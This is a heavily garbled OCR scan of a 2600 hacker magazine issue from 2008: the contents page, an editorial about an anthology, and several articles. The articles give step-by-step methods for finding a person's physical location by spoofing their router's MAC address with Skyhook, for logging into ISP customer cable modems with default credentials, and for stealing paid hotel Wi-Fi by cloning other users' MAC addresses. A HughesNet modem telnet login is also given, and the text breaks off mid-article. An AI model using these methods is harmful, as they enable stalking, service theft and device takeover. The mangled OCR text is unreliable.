Toe

The Best of Times

Don't "Locate Me"
Exploring Road Runner's Internal Network
Hacking Wireless Networks with Wndows
The HughesNet FAP
TELECOM INFORMER
Hacking Society
Thirteen Years of Starting a Hacker Scene
HPing (The Part I Forgot)
Meditation for Hackers: All-Point Techniques
Fun with Network Friends
Hacking: A Grafti Writer's Perspective
HACKER PERSPECTIVE: Barry Wels
A Portable Encrpted Linux System for Windows
Mac Address Changer
Capturing Botnet Malware Using a Honeypot
LETTERS
Cracking with the Webtionary
JavaScript Password DOMination
Spirits 2000 Insecurity
TRANSMISSIONS
The Geek Squad
Bank of America Website Flaw
Why is This Computer Connected to the Internet?
Stor: Message of the Day
MARKETPLACE
MEETINGS
6
8
10
12
13
15
17
20
22
24
25
26
29
30
31
34
48
49
52
54
55
56
58
62
66
History is something that we're al ways a l oad of troubl e for thei r efforts. But there
living but ra rel y appreciating. This year, al l was sti l l this l ink to the past, where main
of that changed for us. We got the incred- frames dominated and phone phreaks l ived
ibl e opportunity to trul y acknowl edge the in fear of arousing the i re of Ma Bel l .
significance of the changing trends and The 1990s was a period of growth
technol ogies that we have been witnessing where both tel ecommunicat i ons and the
since 1984. And now we're ready to share concept of the I nternet soared into the
what came out of it al l . stratosphere. Suddenl y, everyone seemed
We're happy to announce the publ ica- to be fol l owing this stuff and the hacker
tion of our first-ever book: The Best of 2600: wor l d fel t the effects in both good and bad
A Hacker Od
y
sse
y
. When we were first ways. Having more peopl e getting invol ved
approached with the idea for this proj ect, was certainl y nice. But al l of the attention
it seemed a daunting task. And it was. was a royal pain in the ass. Hackers had
After al l , how cou l d we possibl y pick and al ways been l ooked upon with suspicion
choose from 24 years of publ ishing? And and paranoia but now it had graduated to
how woul d such a col l ection be ordered? genuine fear and the desire to put certa i n
The al most infinite amount of themes and offenders behind bars. We saw that happen
subj ect matter we've gone through in so too many times. The dot-com boom t ur ned
many issues made thi s seem l ike something many of our f riends into very r i ch people
we cou l d never pu l l off. and that tended to put all sorts of values on
So our biggest cha l l enge was getting a col l ision cou rse. And of course, thi s was
this massive amount of a rti cl es into some the decade that the medi a really j umped
sort of order. After much brainstor mi ng, we into the fray. There were books and movi es
found the answer to be star i ng us i n the about hackers galore. Aga i n, a bit of f un
face the whole ti me. What we've wi t nessed and a bi t of a pa i n.
throughout al l of our pages spans three very Then came 2000 a nd beyond. The wor l d
disti nct decades: the 1980s, the 1990s, and i n thi s peri od seems to have gotten so much
the post 2000 period. And that i s how we more seri ous. Everyone appears obsessed
deci ded to di vi de the book. By decade. I n wi th securi ty a n d convi nced that everyone
so doi ng we qu i ckly discovered that there else is out to get them i n one way or another,
was a very noti ceable change of mood and whether i t be by steal i ng thei r i denti ty or
tone when looki ng at such peri ods as cohe- blowi ng them to smi thereens. The net has
si ve u n i ts and then compar i ng them t o each become a fi xture i n our dai ly rout i nes,
other. speed and storage j ust keep i ncreas i ng
For example, the 1980s was fi lled wi th on a conti nual basi s, and communi cati ng
a sense of wonder as so many new t hi ngs has never been easi er. But somehow, the
were start i ng to come i nto play. The Bell i nnocence of our past seems to have been
System was bei ng torn apart. Computers di mi ni s hed. To many, the s i mple roma nce
were becomi ng more and more popular of playi ng wi th new technologi cal toys i s
and bei ng fou nd i ncreasi ngly i n t he home. noti ceably lacki ng and technology has
Hackers were among the f i rst t o f i gure i t all become more of an assumed fact of our
out, f i ndi ng ways of s hapi ng the technology everyday l i ves. I t's actually become easi er
t o thei r needs, and, naturally, gett i ng i nto for many of us to stay con nected t han to try
Pa
g
e 4

2600 Ma
g
azine
a nd di sconnect.
in each of these di sti nct peri ods, we
fou nd there to be one remaining constant.
The hacker cul ture has remai ned true to
its bel i efs and l argel y u naffected by the
changi ng wor l d a round us. i f you l ook at
one of our articl es from our ear l y days and
compare it to someth i ng from thi s i ssue,
you' l l not i ce that, whi Ie the technol ogy
is compl etel y di fferent, the spi r i t behind
the wri ting has mor e or l ess rema i ned
t he same. it's al ways about aski ng ques
t i ons, performi ng a l l sorts of experi ments,
theori zi ng, and, above a l l el se, shari ng thp
resu l ts with the rest of us. Throughout al l
of the change and tu rmoi l , thi s much has
fema i ned.
Oncp we rpal ized that wp had these
three un i que decades and a common
thread' that ran between them, i t was j ust
a matter of picki ng the stori es that bpst
summed up what was goi ng on at the timp.
;s it tu rned out, this was another d,l unting
task. There were just so many fascinating
pieces that have gone into our pages ovl' r
the years that it became pa i nfu l to deci de
wh i ch ones wou l d be i ncl uded and whi ch
wou l d have to be l eft out. And even after
we had done a whol e l ot of cutting and
t rimmi ng, it was al l too cl ear that WP just
had an CJveralJllnc,mcp of m,lteri,ll . Trying
to fit it into a 360 page book wou I d be
next to imposs i bl e. in fact, just the 19BOs
cou l d have easi l y fil l ed the entire page
a 1I0cation i f we had l et it.
Fortunatel y, our publ ishers had the
good sense to l ubby for a dramatic
i ncrease in size for the book cnd we
found oursel ves wi t h a l i mi t that was over
600 pages instead. As the months went
on, t hi s wou nd up bei ng i ncreased once
more to near l y 900 pages ! Apparent l y,
the publ i shers had j ust as di ff i cu l t a t i me
f i gur i ng out what t o cut as we di d. What
better endorsement cou l d we poss i bl e ask
for?
arti cl e i n our very f i rst i ssue ended wi t h the
sentence: "Tu rn the page and become a
part of our u nique worl d.")
We want to tha nk the many readers who
have been suggest i ng somethi ng l ike t hi s for
yea rs. We do l isten to these suggest i ons ane
we're happy t hat t he opportuni ty presented
i tsel f where we cou l d act ua l l y bring these
ideas to fru i tion. We al so want to t ha nk
Wi l ey ruhl i shing ane the many ppopl e
over there who have worked with us on this
project since it began l ast year. We now
h.Jve something which | make good
dedi of our material I1 l ot mor e accessibl e,
not oniy to our existing readers hut to 1
vast nu mber of others who have never pven
he.ml of 26()(} ,1e whose onl y [wneption
of what hackl'rs are ahout comes from thp
mass medi 'l. This i s c\ tremendous opportu
nity to h.lp our voices hc,lrd in whol e
new .Hen' ,mel to open somp doors in what
others on Iy spe as wa l is.
And fo lTlany of us, this wil l ill' t111
.1Il1.1Zing trip dO

n Memor y L.Ull'. We tend

to forgpt a II of the ITdgic of thp past and tie
significancc' of thl' differences in the WoY
things used to work, both big things ,me
litt l l' things. An pro wlwn sonwtiling like
Cal l er I f WiS seell as ext reillel y contro
versial , when packet switched ndworks
were al l the rage, when [Xlgers we're far
mor e preval ent than cel l u l ar phones, when
scnrii ng el ectron ic mai I between di rent
computer systems W.1S a real l y big deal . it's
one thing to simpl y remember t hose days,
quite another to i mmerse yoursel f in the
words and emotions of the t i me period.
What's most amazing to us is how relevant
it al l is, even when the tech nol ogy i s al most
u nrecognizabl e. ;nd for those of you who
weren't even a l i ve back then, there is no
better way to get a true sense of the h i story
that we a l l know i s out there somewhere.
ThE Best of 2600 wi l l off i ci a l l y be
rel eased at The Last HOPE conference
and wi l l be ava i l abl e thereafter a l l over
the wor l d. We doubt there wi l l ever be a
book wi t h t hi s much i nformati on about
the hacker worl d crammed i nto so many
pages. But we certai nl y do hope to see a l ot
more hacker- rel ated books and an overal l
i ncrease i n the i nterest l evel stemmi ng from
a l l of th i s. Because one th i ng we l ear ned
from goi ng t hrough every a rt i cl e we ever
pri nted, apart from bei ng utter l y capti vated
by some of the stor i es, is that th i s stuff rea l l y
does matter.
in the end, we wou nd up wi t h a pretty
neat col l ection of some of what's been
goi ng on i n the hacker wor l d i n the l ast
quarter century. Wh i Ie i t's t i t l ed ThE Best
of 2600, there a re sti l l l ots of good pi eces
that di dn' t make it in for one reason or
another. But we bel i eve that i f you l ook at
a l l of the pi eces that are i ncl uded, you' l l
get a pretty good sense of what's been
happen i ng i n our un i que wor l d s i nce our
fi rst i s s ue i n 1984. ( i n fact, the very f i rst
Summer 2008
Pa
g
e 5
ni
t
'
Loca
t
e Me
'
by Terry Stenvol d
thebmxr@gmai l .com
Di scl ai mer
Th i s arti cle i s for educati onal purposes
only. Check local laws before attempti ng
anyth ing. The author holds no responsi bi li ty
for the use or mi suse of th i s i nformati on.
General I nformation
As you may know, there i s a new feature
i ncluded i nt he GoogleMaps 1.1.3 update for
the Apple i Phone and i PodTouch: the " Locate
Me" feature. The new feat ure is provi ded by
another company called Skyhook Wi reless
(http://www.skyhookwireles .com/).
Skyhook's system i s named WPS, for Wi re
less Posi t i on i ng System, and locates users
by knowi ng the locati on of thei r wi re
less aperforms thei r locati on features in a
u n i que way because WPS requ i res knowl
edge of the speci fi c geographi cal locati on
of i ndi vi dn and locate access poi nts, and
they then append th i s i nformati on t o a large
reference database. The problem wi th the
system, other than knowi ng someone has
dri ven by your house or busi ness and added
your AP' s i nformati on to a large database, i s
that a thi rd party can t hen locate you wi th
only your MAC address. I recently emai led
Skyhook and asked i f there i s a way for
people to lotabase besi des unpluggi ng the
access poi nt.
Th i s art i cle wi ll provi de evi dence contra
di cti ng both answers provi ded by Skyhook.
It wi ll also explai n how someone wi th mal i
ci ous i ntent could possi bly di scover your
locati on.
mode; an i Phone, i Pod Touch, or any other
mobi le devi ce wi th the "locate me" feature;
the MAC address of your vi cti m; and an
i solated area where no access poi nts have
been located and added to Skyhook' s refer
ence database.
Scri pts
There are two scri pts i n t hi s system.
skyhack . sh wi ll create a br i dge between
the ethernet and wi reless card to create
an AP envi ronment. You can also use two
wi reless cards, but the AP broadcast i ng
must be unmarked by Skyhook, whi ch
would requi re edi t i ng the scri pts. delbrO o
sh destroys the bri dge, wh i ch returns your
computer t o normal.
Step 1: Gai ni ng the
MAC address of a vi cti m
The process of acqu i ri ng a MAC address
is beyond the scope of th i s arti cle, but I wi ll
Requi rements
provi de some general i deas as to how to do
To r un these scri pts, you ' ll need a
i t. Wi reless router packagi ng often di splays
L i nux computer wi th an ethernet connec-
the MAC address on the outsi de of the box,
t i on and a wi reless card capable of master
so sales personnel at an electron i cs store
Pa
g
e 6
2600 Ma
g
azine
could eas i ly wri te down the MAC address
and keep that i nformat i on unt i l the product i s
sold. This i s fai r l y useless, because the MAC
address L be cloned dur i ng the set up of
a wi rel ess router, wh i ch wou l d then change
the address, renderi ng the ori gi nal i nfor
mat i on obsol ete. Anot her way to acquire a
MAC address i s vi a soci al engi neeri ng. Thi s
i s accomplished by conni ng an i ndi vi dual
i nto di vulgi ng thei r MAC address. Google
is another source that can be used to obtai n
MAC addresses. Some people post t hei r
MAC addresses wh i le seeki ng help i n a
forum to solve a problem. Gai ning access
to a computer t hrough a Troj an horse and
runni ng the command
"
arp -a
"
Step 2: Setti ng up your computer
The basi c i dea i s to make your computer
i nto an AP that spoofs the vi ct i m's MAC
address. The way we do t hi s is to bri dge the
ethernet cable and wi reless card. The wi re
less card wi ll then act as the access poi nt
of the spoofed vi ct i m. To run the bri dgi ng
scr i pt, run t hi s command from the console:
. /skyhack . sh 00:00:00:00:00:00.
You need to change the MAC address to
the twelve-character MAC address of the
vi ct i m. Your connecti on wi ll then bri dged,
and the router's DHCP server wi II hand out
an I P address to your mobi le devi ce when
connected.
Step 3: Fi ndi ng the
approxi mate l ocation
When you go to your mobi le devi ce, you
should see the SSI D "skyhack. " Connect to
t hi s "skyhack" network. To ensure that your
connecti on is worki ng properly, check that
your IP address i s not in the 169. 254. 0. 0
address block. Your web browser should
then be used to load a webs i te to guarantee
that you are recei vi ng i nternet traffic. If
t hi s works, you are now ready to connect
to Google Maps and use the "locate me"
feature. Make certai n there are no other
AP' s around; i f there are, be sure that they
are not i n Skyhook's database, as they can
affect your results. By usi ng the "locate me"
feature, you should now be able to see
the vi cti m's approxi mate locati on wi thi n a
100m-200m di ameter.
Step 4: Locati ng vi ctims'
exact locations
Use Google Maps to gi ve you dr i vi ng
di recti ons t o the approxi mate locati on
gi ven. To ret urn your computer to normal ,
run . IdclhrO. coh. Thi s removes the bri dge
belween your elhernel and your wi rel ess
card. I t al so ret urns your wi rel ess card to
managed or ddault mode. Now, dr i ve to the
approxi mate location, and scan the l ocal
area wi th your laptop or mobi l e device for
the speci fi c MAC address i n quest i on unti l
the locat i on is pi npoi nted.
Preventi on
To prevent t hese types of securi ty
breaches, keep your software patches up-to
date and use vi rus and malware scanners to
prevent i ntrusi on by others who may then
acqui re the MAC address of you r router.
Al so be wary of techni cal helpers over
the phone or over the Internet who ask for
your MAC address. A more defi ni te way to
prevent i nt r usi on is to use the "Cl one MAC'
feat ure that can be found on most router
conf i gurat i on pages. Thi s i s pr i mari ly used
to prevent the I SP from blocki ng i nternet
access to your newly acqu i red hardware,
maki ng it so t hat onl y your PC can access
the i nternet . Thi s tool can also be used to
change the MAC address so that i t wi ll poi nt
i ntruders to nowhere or wi ll poi nt them to
someplace completely di fferent. Always
check that the newly changed MAC address
is not s i mi lar to a nei ghbor's. With Skyhook
clai ming that i t i s not possi ble to remove
si ngle AP' s from thei r database, t hi s i s the
best met hod, as long as you change the
MAC often.
Thi s method of locati ng has been tested
wi th access points around my local area and
also wi th a fri end who li ves almost 8000 km
away. Please note that t hi s "attack" is only
as accurate as Skyhook's database.
As a si de note, these types of attacks
could be used to tell fri ends your home
address. I nstead of tell i ng them that the
address i s "2600 Robert Street," you could
say, "I am l i vi ng at 00: 00: 00:00:00:00. "
Notes
The scr i pts provi ded in th i s arti cle wi ll
not work out of the box wi th any wi reless
card or ethernet adapter unless the i nterfaces
are named athO, wifO, and ethO. In most
other cases, a si mple change from a thO to
ethl or wlanO is all that is needed. Usi ng
di fferent routers wi ll also requ i re di fferent
I P ranges. For example, Dli nk routers would
use 192 . 168. 0.5 i nstead of 192 . 168. 1. 5.
Summer 2008
Pa
g
e
7
by Tim The cable m is essentially doing very
simple routing for your computer. It is simply
Most ISP s require you to have a modem
taking everything given to it and pushing it
of some sort. For broadband cable, this is through the other side in accordance with
usuallv a DOCSIS (Data Over Cable Service the ISP's settings. This is how it was intended
Interfce Specifications) compatible device,
to be. Th cabl company can terminate your
version 1.0, 1.1, 2.0, or 3.0, depending on connection by sending a series of commands
your ISP's needs. This device is essential to the device. It can similarly throttle your
to cable intern!t as it isolates and uses the connection, do troubleshooting, and so on.
various frequencies on the cable line which
They do this either by using proprietary tools
have been reserved for internet service. All such as Orion, which has some phenom-
of this information is determined by your ISP enal CMTS tools, or by using in-house tools,
and is delivered to the cable modem via tftp usually PHP, ASP, or Perl scripts running on
from some server on your ISP's non-public
some machine that manages the network.
network. Your cable modem has a MAC (See the resources at the end of this article
address like any other network device, and for some interesting sites on the Road Runner
it is usually this that the ISP uses to authen- network). From there, they ran do all sorts of
ticate you to the network. The CMTS (Cable
stuff, but the important thing to remember is
Modem Termination System) is where the
that they are not using your public IP address
transition between cable and fiber happens,
to do this; they are using the private IP
for those that are interested. At any rate, once address given to your modem. This is where
your device is determined to be legitimate- m)' story begins.
again, the method is determined by the ISP, I was sitting in my office, configuring my
but is most likely the MAC address-you are router to support the addition of a couple
leased H public IP address. There is also an more subnets in the 10.0.0.0/24 range. As I
internal IP address granted to the modem, was doing this, I decided that the easiest way
and it usually resides somewhere in the 10.x to test for connectivity among the various
private subnet. This address should never be subnets was to simply allow all traffic on the
accessible either from your own computer
10.0.0.018 network to pass to any of the other
or by anyone else that isn't correctly authen- subnets. So, I set all this up and let some
ticated on the network. This is to prevent ICMP traffic fly across the wires. This is where
various horrible things from happening, such it got interesting.
as the use of one of the many in-band config- I typed an IP address incorrectly. To be
uration methods for routers and switches that specific, I typed 10.0.0.10 and pressed enter.
reside on the networks. Most devices decide Knowing that this I P address would not be
who should be able to access the device found on my network I went to Ctrl+C the
remotely only by seeing which network command. What did I see appear on my
they reside on. If you access the 10.x side
console? "Reply from 10.0.0.10: bytes=32
of the device, the odds are good that you'll time=76ms TTL=128." My first thought was
be allowed access at least at the same level
that someone had penetrated my network
as the I SP. Simple enough. Now, once your
and established an entire subnet without me
device is given the correct network configu- noticing. Then I saw the latency and decided
ration, it then forwards those settings onto to do a traceroute. Sure enough, the trace
your computer. If you are not using a router passed through my router, through the I SP
or some middle-man appliance, then your provided modem, and over the Road Runner
computer will inherit the TCP/I P configura-
network, eventually coming to a stop at some
tion, allowing you to access the internet at
poor soul's Ambit Cable Modem.
large.
Admittedly, I was very curious, so I ran
Pa
g
e 8
2600 Ma
g
azine
some s i mpl e n map commands and di scov- me. There don ' t seem to be any restrictive
ered that th i s devi ce was l i sten i ng on port 80. meas ures i n pl ace or anythi ng, B i l l . As for
So, I l oaded fi refox and hi t the devi ce wi t h how th i s has been happen i ng, I ' m not s ure. "
HTTP. Sure enough, I saw t he cabl e modem' s "Okay, do you see any other pri vate I P
management screen . Bei ng t he concernec addresses, a nyth i ng l i ke 192? "
citi zen that I am, I tested the l ogi n to make " Does n ' t seem l i ke i t, B i l l , but I haven ' t
s ure t he defau l ts ha d been changed. Much rea l l y l ooked ei t her. "
to my su rpri se, I cou l d l og i n and get fu l l " How are you seei ng these I P
vi ewi ng and confi gurat i on access wi t h user- addresses ? Are you us i ng a packet sni ffer or
name and password " user." I then had admi n someth i ng? "
access t o someone' s cabl e modem, compl ete At th i s poi nt, I real i zed t hat he was very
wi t h an i nternal I P address range on Road concerned and that he was fi s hi n g for i nfor-
Ru nner's network, the publ i c I P address, the mat i on. I tol d the truth, as I don' t want to go
MAC address, and everyt h i ng el se neeced to j a i l for terror i s m or some other equa l l y
to cl one thei r cabl e modem and stea l thei r abs urd reason. ( Hooray for abus i ve and
servi ce. From t he screen whi ch came u p, you unconsti tut i onal l aws ! )
can restart the devi ce, reset i t t o t h e factory " I ' m j ust us i ng nmap t o scan t h e s ubnet,
defau l ts, or do pretty much anyth i ng you no packet s ni ffers or anyth i ng. So, yeah, I ' m
want. My mi nd boggl es at the concept. And act u a l l y very concerned about t hi s. I f I can
t hi s i s j ust 10 addresses i nto a 16 mi l l i on host see these i nternal I P addresses, it means that
subnet. I i mmedi atel y powered up nmap wi th I can sn i ff traffi c off the network as wel l , Bi l l .
OS fi ngerpr i nti ng and vers i on scann i ng wi t h I don' t l i ke t hat . I f I found t hi s by mi sta ke,
t he target network of 10.0.0.0/8. I watched someone out t here wi l l certa i n l y fi nd i t as
as the l og f i l e grew from 1 k to 10k to lOOk to wel l . I mean, i f I were ma l i ci ous, I cou l d
1 OOOk. After H coupl e of hours, I h a d a 5MB ca use some ser i ous damage. These devices
fi l e, fu l l of cabl e modems runni ng HTTP, SSH, have defaul t admi n l ogi ns. Oh, and t he guy
tel n et, and var i ous other servi ces, a l l of them at 10.0.0.10 i s havi ng network i ssues. "
us i ng defa u l t l ogi ns and passwords. Most of " Rea l l y? " He chuckl ed nervous l y. "Wel l ,
t hem are runni ng vul nerabl e vers i on of SSH, hol d on a mi n ute. I have t o make a cal L"
and a l l of t hem wi l l fa l l back to SSH1, whi ch I wa i ted on hol d aga i n, t hi s ti me for onl y
means that any passwords that may be i n a coupl e of mi nutes.
pl ace protect i ng t he s hel l access are usel ess. "Al ri ght, the securi ty speci al i sts say that
I suddenl y real i zed that Road Ru n ner th i s i s nor mal for the networ k. Si nce you ' re a
mi ght noti ce a l l of t he scanni ng that I was part of t he network, you shou l d be abl e to see
doi ng, so I cal l ed up Road Ru nner tech the other machi nes, so i t ' s okay. You ' re on a
s upport and as ked to speak to someone i n the busi ness accou nt and, s i nce you have a stat i c
securi ty department . They put me on hol d, I P, you are abl e to see some th i ngs t hat most
and I l i stened to crappy mus i c for about ten of our customers cannot. I ' l l make some notes
mi nutes before someone fi n a l l y pi cked up. on your account so that i t ' s c l ear t hat you
We wi l l cal l h i m B i l l . ment i oned t hi s to u s a n d were concerned.
" Hel l o, t han k you for cal l i ng roadr un ner You mi ght get a cal l from the Road Runner
techni cal s upport. My name i s B i l l , how can securi ty depart ment s ome t i me i n t he future.
I hel p you ? " I s t here a nyth i ng el s e? "
" Hi , B i l l . My name i s Ti m. I ' m j ust cal l i ng The conversati on ended wi t h t he standard
to report some strange behavi or on your scri pted cl os i ng, and I hung up the phone.
network. I t seems that I am abl e t o see some of Nor mal operati onal behavi or? An ent i re
your i nter nal I P addresses . I can access your i nter nal I P address range ava i l abl e publ i cl y?
enti re cl ass A subnet as i f i t were publ i c. " I cou l d see not j ust an ent i re subnet, but t he
"Oh . . . hol d on a mi n ute. I have to make enti re 1O.x network, t he enti re Road Runner
a cal L" network. I deci de to test B i l l ' s theory about
I was t hen put on hol d for about twenty t he busi ness connecti on. I SSHed i nto my
mi n utes. Eventua l l y B i l l returned, wi t h an L i nux box at home and i ssued a p i ng t o
edge of concern i n h i s voi ce. 10. 0. 0. 10. Sure enough, i t responded. So,
"Can you gi ve me some more i nformat i on everyone on t he Road Runner network can
about t hi s? What addresses are you seei ng? s i mpl y use t hi s pri vate I P range to access
What do you thi n k i s a l l owi ng you to do network equ i pment . I qui ckl y l oaded up
t hi s ? " nmap and cont i n ued t he scan .
"Wel l , a n y I P address on t he Road Runner At th i s poi nt i n t i me, I had foun d several
network that starts wi t h lO i s vi s i bl e to t housand modems, near l y a l l of t hem run n i ng
Summer 2008
Pa
g
e
9
webservers, many of them a l so ru n n i ng SSH
and tel net. I al so found several cabl e modems
act i ng as routers. I f someone were to l og i nto
one of those devi ces, i t wou l dn ' t be hard to
set up forwards i nto the NATed network or
to forward a l l thei r traffi c through a t unnel
t o s ome other Pc. The possi bi l i t i es t hen
wou l d be near l y l i mi t l ess: h i j acki ng Vol P
servi ce by cl on i ng thei r hardware, steal i ng
i nternet servi ce by cl on i ng t he MAC address,
changi ng setti ngs, or redi rect i ng the l ocat i on
of t he defa u l t DOCSI S servers, among other
th i ngs.
As far as I SP-Ievel equ i pment goes, Road
Run ner ' s DHCP servers, DNS servers, and
network moni tori ng servi ces are al l ava i l abl e
for sca n n i ng. Worse, n map' s versi on report i ng
opt i on ( -sv) shows vers i on n umbers for the
servi ces run n i ng. Many of these are reported
correct l y, and several of t hem are vu l n erabl e
t o very wel l - known expl oi ts. For i nstance,
on one part i cul ar server the SSH daemon i s
set t o rol l -back t o SSH1 i f t he c l i ent doesn ' t
s upport SSH2 . As i de from al l of that, a qu i ck
scan of the l og fi l e reveal s t he type of I DS
they' re us i ng, the type of network moni tori ng
software they' re us i ng, strange and u nneeded
th i rd party appl i cati ons such as screencast,
and other pi eces of i nformat i on, a l l freel y
ava i l abl e. Honestl y, I don ' t i magi ne that i t
wou l d take a s ki l l ed hacker more tha n an
hour or two to s uccessfu l l y compromi se t he
systems . The servers are pretty homogeneous,
apparent l y consi st i ng mai n l y of L i n u x servers
ru n n i ng essent i a l l y the same app l i cati ons, so
the odds are good that i f you can compro-
by Carbide
mi se one system, then you can take the rest as
wel l . Al so, each system seems to be a centra l
I DS report i ng center, most l i kel y for whatever
sect i on of t he network it control s, and sys l og
i nformat i on i s forwarded to those mach i nes.
The i nformat i on that cou l d be gl eaned from
t he l og fi l es al one wou l d be worth i t s wei ght
i n gol d.
Of t he 25, 000 or so devi ces that showed
up, about 100 of them seemed to be I SP
servers. I stopped sca n n i ng after about 12
hours because I fel t l i ke I had seen enough,
but anyone who were to scan t he enti re 10. x
s ubnet wou l d undoubtedl y di scover much
more t han I have.
Needl ess to say, t he potent i a l for abuse
here i s tremendous, and i t ' s shocki ng that t hi s
ki nd of network behavi or was ever engi neered
to begi n wi t h. Under nor mal ci rcu mstances,
thei r routers and fi rewal l s shou l d fi l ter publ ic
requests for pri vate I Ps, but I guess th i s i s n ' t
bei n g done.
I guess i t's true what they say about corpo
rate networks: hard on the out si de, gooey on
t he i nsi de.
One fi nal note: There are i nterest i ng
si tes at tool s.location.rr. com, where loca
tion i s your geographi cal regi on, us ual l y
pretty easy t o fi gure out. For exampl e, the
Tampa, F l ori da area i s http://tools.
-tampabay. rr . com. The l ogi n and pass
word have recent l y changed, but these s i tes
conta i n a l l t he i nformat i on needed to h i j ack
someone' s account or t o change most, i f not
a l l , of t he servi ces attached to the account.
Pretty s l i ck stuff.
Open i n g u p F i refox took me to the page that
expl a i ns the pri ci ng a n d s ervi ce. The hot el
Fi rst, t he n ecessary di scl ai mer: gai n i n g I was i n happened t o have on l y u n l i mi ted
u n authori zed access to wi re l ess n etworks, p l a ns, whi ch I ' l l expl a i n l ater. My fri end
especi a l l y when someone wants you t o pay, once tol d me that he had read i n 2600 a
is probabl y i l l ega l . Thi s art i cl e is provi ded way to gai n access to wi rel ess n etworks
for i nformat i on on l y. by MAC address spoofi ng i n L i n ux. He
I was recentl y on a bus i n ess tri p, a n d basi cal l y descri bed that you fi nd other
I took the compa n y-provi ded Wi ndows computers on the wi r el ess n etwork, the n
l a ptop wi th me. The hot el I was stayi ng fi n d thei r MAC addresses, the n cha nge your
i n had wiyport wi rel ess access1 for a fee. MAC address to match thei rs. Once thi s i s
Pa
g
e 10
---------600 Ma
g
azine
done, t he wi rel ess router routes every other
packet to your computer. The way i t was
descr i bed, t he wi rel ess router t h i nks both
computers are on e computer because they
h ave same hardware address.
Not h av i ng L i n ux wi t h me at the ti me,
I made s ure I had two very i mport ant
programs: Kaboodl e' a n d Tech n i t i um MAC
address cha nger' . Fi rst, I con n ected to
the wi rel ess access poi nt of i nterest a n d
opened u p Fi refox t o ens ure th at t h e correct
page was di s pl ayed. Second, I opened u p
Kaboodl e a n d wai ted for every computer
on the n etwork to be scan ned. Thi s may
take a wh i l e i f t he n etwork i s rea l l y bus y.
Then, t he computers were di s pl ayed; s ome
are shown as computer n ames l i ke NANCY,
others as IP addresses. Doubl e cl i cki n g on
on e of t hem s hows t h e computer ' s MAC
address:
--|vsc.-o, -.j
M
Ceot 1o- tm e.mA~
The n ext step i s to change your MAC
address to t he on e t hat i s di s pl ayed. There
are severa l ways to do t hi s i n Wi n dows.
On e way t hat I'm fami l i ar wi t h i s to edi t t he
regi stry to change t he address, but I prefer
t he Techn i t i um MAC address changer for
frequent changes. Open u p t h i s program,
a n d change t he MAC address to t he on e
t hat i s di s pl ayed by Kaboodl e:
The wi rel ess card s hou l d be d i s abl ed
a n d t hen re-en abl ed, a n d then it s hou l d
recon n ect t o t h e n etwork of i nterest .
Navi gate to your h omepage a n d i t
s hou l d di s pl ay. Some probl ems that mi ght
be e ncou ntered are s l ow page l oad ti mes,
frequent d i scon n ects a n d recon n ects to
the access poi nt, a n d a compl ete i nabi l i ty
to access the AP at a l l . I encou ntered s l ow
page l oad ti mes. Th i s mi ght be attri b
uted to both computers tryi n g to access
a l ot of i nformati on at one ti me or down
l oa di ng or u pl oad i ng l arge a mou nts of
dat a. If t h i s h a ppens, changi ng to a di fferent
MAC address mi ght be u sefu l . The secon d
probl em mi ght be t h e router try i n g to
defeat t h i s met hod, detect i ng two i denti cal
MAC addresses, a n d n ot a l l owi n g ei t her to
Con_"" V8esN|w0rkCom"loon
().y"eNro . DeIIT,uobM115DS.,,,W.eIollNfM.PC
rlaod"OelD ;.--.-~_.-:_;. .:
Co""\I",nID . {b9532159-0020-47A1-1C19-37940X39CIJ
O-130H5Hf{Ch"Qedl
InteICOIPOIolejI-13-021 A0cbJ
con n ect. The t h i rd probl em mi ght be t hat
t he router has detected on e MAC address
fi rst a n d wi l l n ot a l l ow an i denti cal on e to
con n ect because i t has a l ready associ ated.
Several moral a n d eth i cal probl ems
mi ght be con s i dered. For exampl e, i f t hi s
i s n ot a n u n l i mi ted pl a n , t hen each byte
mi ght cost t he customer money. Common
courtesy wou l d d i ctate that you make s ure
you ' re us i n g an u n l i mi ted pl a n . Al so, i f t he
u ser s us pects t hat act i vi ty has been goi n g
on wh e n they were n ot us i n g t h e servi ce, i t
mi ght rai se some quest i ons . Anot her poten
t i al probl em wou l d ari s e i f th e customer gets
randoml y ki cked off; t hey mi ght cal l tech
n i ca l s upport to i nvesti gate, wh i ch cou l d
furt her compl i cate matters. The l ast moral
d i l emma i s chargi n g for wi rel ess access i n
t he fi rst p l ace, wh i ch s hou l d put peopl e
at u n ease, but, surpr i s i ngl y, does n ' t . One
probl em wi t h t hi s i s chargi n g for a s ubstan
dard s ervi ce when oth er servi ces are ava i l
abl e that peopl e wou l d h ave n o obj ect i on
to pay i n g for, s uch as et h er net a n d fi ber
opti c con nect i ons . The other probl em wi t h
chargi n g i s that offer i ng free wi rel ess access
attracts customers to whatever servi ce you
are offeri ng, whet her i t's stayi ng at a h ot el or
gett i ng a cup of coffee. I apol ogi ze for t he
di gress i on and for any d i sagreei n g l etters
that mi ght fol l ow.
References
http://www . wayport . n et/
2http://www.kaboodl e.org/
l http ://tmac . technitium . com/
-tmac/
Thanks: Droid for tellin
g
me about
this method and the author of the 2600
article about it.
Summer 2008
Pa
g
e 1 1
he HughesNet FAP
by ntbnnt
I use satelli te I nternet, whi ch i s great
for web browsi ng, I RC, 1 M, e-mai l, and
the l i ke. But i t offers absolutely no conve
ni ence whatsoever for downloadi ng musi c,
l i steni ng to i nternet radi o, or downloadi ng
my favori te Li nux di stro.
You see, HughesNet has a part i cularly
restri cti ve Fai r Access Pol i cy ( FAP) . Now, I
understand perfectly why a FAP is needed;
however, i t seri ously l i mi ts many of the
more obvi ous and useful appl i cati ons of
h i gh-bandwi dth I nternet.
Havi ng the hacker ' s perspecti ve, I ques
ti oned i f i t were possi ble to reset my I nternet
usage stati sti cs, so that I 'd be able to take
the 2 .5 hours of non-stop HTTP commu
ni cat i on t hat i t takes t o download an . i so
of Debi an wi thout havi ng to wai t 24 hours
after each hundred megabytes.
The equ i pment for a HughesNet connec
ti on i s a satelli te di sh, i ts radi o, and a recei ver,
or modem if you wi ll. The modem is a bas i c
VxWorks-based router wi th only one port
and the equ i pment and software to i nterpret
the satell i te si gnal. You can telnet i nto t hi s
router by connect i ng t o 192 .168.0.1: 23
and enteri ng the username brighton and
the password swordfsh. Anyone wi th
experi ence hacki ng VxWorks equ i pment
should f i nd a new toy i nstantly wi th that
i nformati on. But, onward to the FAP i ssue.
There i s a separate tel net daemon
runni ng on the HughesNet modem. I t i s
l i steni ng for the free-mi nded to call upon
i ts power at 192.168.0.1: 1953, and
Hughes made i t easy for us, si nce we can
